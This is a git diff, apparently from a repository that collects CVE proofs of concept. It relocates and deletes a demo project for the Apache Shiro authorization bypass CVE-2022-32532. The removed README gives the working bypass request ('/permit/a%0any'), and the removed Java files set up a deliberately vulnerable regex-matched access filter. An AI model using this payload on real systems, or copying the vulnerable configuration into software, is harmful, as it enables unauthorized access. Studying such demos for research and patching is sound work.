diff --git a/.gitmodules b/.gitmodules
index 869d5aae..6ee874ba 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -5,6 +5,6 @@
 [submodule "cve/django/2022/CVE-2022-28346/POC_env"]
 path = cve/django/2022/CVE-2022-28346/POC_env
 url = https://github.com/DeEpinGh0st/CVE-2022-28346
-[submodule "CVE-2022-32532"]
- path = CVE-2022-32532
+[submodule "cve/apache-Shiro/2022/CVE-2022-32532"]
+ path = cve/apache-Shiro/2022/CVE-2022-32532
 url = https://github.com/Lay0us1/CVE-2022-32532
diff --git a/CVE-2022-32532 b/cve/apache-Shiro/2022/CVE-2022-32532
similarity index 100%
rename from CVE-2022-32532
rename to cve/apache-Shiro/2022/CVE-2022-32532
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
deleted file mode 100644
index 549e00a2..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
+++ /dev/null
@@ -1,33 +0,0 @@
-HELP.md
-target/
-!.mvn/wrapper/maven-wrapper.jar
-!**/src/main/**/target/
-!**/src/test/**/target/
-
-### STS ###
-.apt_generated
-.classpath
-.factorypath
-.project
-.settings
-.springBeans
-.sts4-cache
-
-### IntelliJ IDEA ###
-.idea
-*.iws
-*.iml
-*.ipr
-
-### NetBeans ###
-/nbproject/private/
-/nbbuild/
-/dist/
-/nbdist/
-/.nb-gradle/
-build/
-!**/src/main/**/build/
-!**/src/test/**/build/
-
-### VS Code ###
-.vscode/
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
deleted file mode 100644
index 975b0366..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/README.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# CVE-2022-32532
-
-## about
-
-This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).
-
-In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
-
-## introduce
-
-Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
-
-This request can succeed
-```http request
-GET /permit/any HTTP/1.1
-Token: 4ra1n
-```
-
-Access is not allowed when there is no token request header
-```http request
-GET /permit/any HTTP/1.1
-```
-
-It can be bypassed in a simple way in special but common configurations
-```http request
-GET /permit/a%0any HTTP/1.1
-```
-
-## reference
-
-https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
-
-This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
-
-Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
deleted file mode 100644
index 5210b547..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
+++ /dev/null
@@ -1,38 +0,0 @@ - - - 4.0.0 - - org.springframework.boot - spring-boot-starter-parent - 2.7.0 - - - com.example - shiro-demo - 0.0.1-SNAPSHOT - shiro-demo - CVE-2022-32532 - - 1.8 - - - - org.springframework.boot - spring-boot-starter-web - - - org.apache.shiro - shiro-spring - 1.9.0 - - - - - - org.springframework.boot - spring-boot-maven-plugin - - - -
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
deleted file mode 100644
index fd71b1a0..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
+++ /dev/null
@@ -1,21 +0,0 @@
-package com.example.shirodemo;
-
-import org.springframework.web.bind.annotation.PathVariable;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.RestController;
-
-@RestController
-public class DemoController {
- @RequestMapping(path = "/permit/{value}")
- public String permit(@PathVariable String value) {
- System.out.println("success!");
- return "success";
- }
-
- // Another Bypass
- // @RequestMapping(path = "/permit/*")
- public String permit() {
- System.out.println("success!");
- return "success";
- }
-}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
deleted file mode 100644
index beaf98ae..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
+++ /dev/null
@@ -1,35 +0,0 @@
-package com.example.shirodemo;
-
-import org.apache.shiro.util.RegExPatternMatcher;
-import org.apache.shiro.web.filter.AccessControlFilter;
-
-import javax.servlet.ServletRequest;
-import javax.servlet.ServletResponse;
-import javax.servlet.http.HttpServletRequest;
-import java.io.IOException;
-
-public class MyFilter extends AccessControlFilter {
-
- public MyFilter(){
- super();
- this.pathMatcher = new RegExPatternMatcher();
- }
-
- @Override
- protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
- String token = ((HttpServletRequest)request).getHeader("Token");
- // todo: check permission ...
- return token != null && token.equals("4ra1n");
- }
-
- @Override
- protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
- System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
- try {
- response.getWriter().println("access denied");
- } catch (IOException e) {
- e.printStackTrace();
- }
- return false;
- }
-}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
deleted file mode 100644
index d24431e4..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
+++ /dev/null
@@ -1,40 +0,0 @@
-package com.example.shirodemo;
-
-import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
-import org.apache.shiro.mgt.SecurityManager;
-import org.apache.shiro.util.RegExPatternMatcher;
-import org.apache.shiro.web.filter.mgt.*;
-import org.apache.shiro.web.mgt.WebSecurityManager;
-import org.apache.shiro.web.servlet.AbstractShiroFilter;
-
-
-public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
-
- public MyShiroFilterFactoryBean() {
- super();
- }
-
- @Override
- protected AbstractShiroFilter createInstance() {
- SecurityManager securityManager = this.getSecurityManager();
- FilterChainManager manager = new DefaultFilterChainManager();
- manager.addFilter("myFilter",new MyFilter());
- // my filter
- manager.addToChain("/permit/.*", "myFilter");
- // todo: add other filters
-
- PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
- chainResolver.setFilterChainManager(manager);
- // set RegExPatternMatcher
- chainResolver.setPathMatcher(new RegExPatternMatcher());
- return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
- }
-
- static class SpringShiroFilter extends AbstractShiroFilter {
- protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
- this.setSecurityManager(webSecurityManager);
- this.setFilterChainResolver(resolver);
- }
- }
-}
-
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
deleted file mode 100644
index 30a0f1b5..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
+++ /dev/null
@@ -1,22 +0,0 @@
-package com.example.shirodemo;
-
-import org.apache.shiro.mgt.SecurityManager;
-import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
-import org.springframework.context.annotation.Bean;
-import org.springframework.context.annotation.Configuration;
-
-@Configuration
-public class ShiroConfig {
-
- @Bean
- public SecurityManager securityManager() {
- return new DefaultWebSecurityManager();
- }
-
- @Bean
- public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
- MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
- shiroFilterFactoryBean.setSecurityManager(securityManager);
- return shiroFilterFactoryBean;
- }
-}
\ No newline at end of file
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
deleted file mode 100644
index 5d4615bd..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
+++ /dev/null
@@ -1,13 +0,0 @@
-package com.example.shirodemo;
-
-import org.springframework.boot.SpringApplication;
-import org.springframework.boot.autoconfigure.SpringBootApplication;
-
-@SpringBootApplication
-public class ShiroDemoApplication {
-
- public static void main(String[] args) {
- SpringApplication.run(ShiroDemoApplication.class, args);
- }
-
-}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
deleted file mode 100644
index e69de29b..00000000